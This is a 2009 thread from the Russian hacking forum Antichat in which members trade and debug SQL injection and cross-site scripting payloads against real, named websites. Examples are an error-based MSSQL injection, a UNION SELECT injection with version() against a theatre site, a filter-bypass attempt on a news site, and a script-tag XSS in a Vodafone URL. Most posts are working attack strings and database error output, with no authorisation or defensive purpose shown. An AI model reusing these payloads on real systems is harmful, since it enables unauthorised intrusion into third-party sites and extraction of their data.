Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

05.03.2009, 23:06
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
or 1=(select @@version)
|
|
|

06.03.2009, 00:23
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме: 2584134
Репутация:
519
|
|
F4R, читай литературу по MSSQL!
|
|
|

06.03.2009, 07:45
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме: 1385078
Репутация:
126
|
|
дак я читал вчера весь день...
на
/details.asp?id=699882982&dme_code=or 1=(select @@version)
выводит
Microsoft OLE DB Provider for SQL Server error '80040e21'
Incorrect syntax near the keyword 'or'.
/inc/connection.asp, line 48
|
|
|

06.03.2009, 09:52
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss &mod=li%20zdes'%20ili%20prosto?
что здесь такое?
|
|
|

06.03.2009, 10:09
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме: 5885100
Репутация:
773
|
|
http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=&mo d=prosto
|
|
|

06.03.2009, 10:10
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме: 11338585
Репутация:
441
|
|
Сообщение от Gorev
http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss &mod=li%20zdes'%20ili%20prosto?
что здесь такое?
Код:
http://www.areaaziende.vodafone.it/190/pace/LoadAction.do?dest=demo&doc=iphone_3g_black&br=xss&mod=<script>alert(/dd/)</script>
 Не более...
|
|
|

06.03.2009, 10:54
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме: 4072944
Репутация:
1550
|
|
http://www.tamasitheatre.ro/ro/1.html?cikk_id=3780+union+select+null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null--
version() PostgreSQL
не могу найти вывод, или все таки слепая?
|
|
|

06.03.2009, 11:30
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от VITАL
есть скуля... вроде. но что то не так
Фильтрация union, select
Работает
http://www.topnews.ru/citation.php?autor=749+order+by+8/*
Неработает
http://www.topnews.ru/citation.php?autor=749+order+by+8/*union*//*
Gorev
http://www.tamasitheatre.ro/ro/1.html?cikk_id=-3780+union+select+null,null,version(),null,4,null, null,null,1,null,null,null,null,null,null,2,3--
|
|
|

06.03.2009, 12:13
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме: 1385078
Репутация:
126
|
|
/details.asp?id=699882982&dme_code=or 1=(select @@version)
вылезает ошибка:
Microsoft OLE DB Provider for SQL Server error '80040e21'
Incorrect syntax near the keyword 'or'.
/inc/connection.asp, line 48
кто что может сказать?
|
|
|

06.03.2009, 12:28
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме: 17621293
Репутация:
4915
|
|
Сообщение от F4R
кто что может сказать?
Я могу сказать вот что:
ОТСТАНЬ ОТ ЭТОГО САЙТА.
И лучше тебе прислушаться 
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|